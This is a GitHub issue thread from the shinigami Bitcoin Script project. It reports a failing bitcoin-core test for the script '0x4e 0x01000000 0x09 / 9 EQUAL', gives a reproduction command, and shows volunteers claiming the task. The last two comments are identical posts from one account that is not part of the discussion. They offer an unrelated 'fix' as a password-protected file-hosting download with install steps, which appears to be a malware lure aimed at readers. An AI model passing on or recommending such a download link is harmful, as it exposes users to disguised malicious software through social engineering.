### ISSUE TITLE
[bug] [bitcoin-core test] '0x4e 0x01000000 0x09 9 EQUAL'

### ISSUE THREAD

**Issue by b-j-roberts** [keep-starknet-strange/shinigami#170]
### Issue

The following bitcoin-core test is failing to give the correct result :
```
ScriptSig: '0x4e 0x01000000 0x09' -- ScriptPubKey: '9 EQUAL'
```

This code should be passing, but is giving an invalid script error. This might have to do with little-endian encoding of the `0x01000000` not being interpreted properly.

### Replicate

To replicate the issue you can use the latest `main` branch with the following command:
```
scarb cairo-run '[[],276712210673542446309439866597955351862704615481,20,[],16079555761881420,7]'
```

**Comment by NueloSE** [comment]
can i work on this

**Comment by PavitraAgarwal21** [comment]
Hey can I take this up

**Comment by RedVelvetZip** [comment]
Hi Brandon, would like to take on this issue!

**Comment by b-j-roberts** [comment]
Thank you @RedVelvetZip , and welcome to the project! Let me know if you have questions or issues related to this!

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
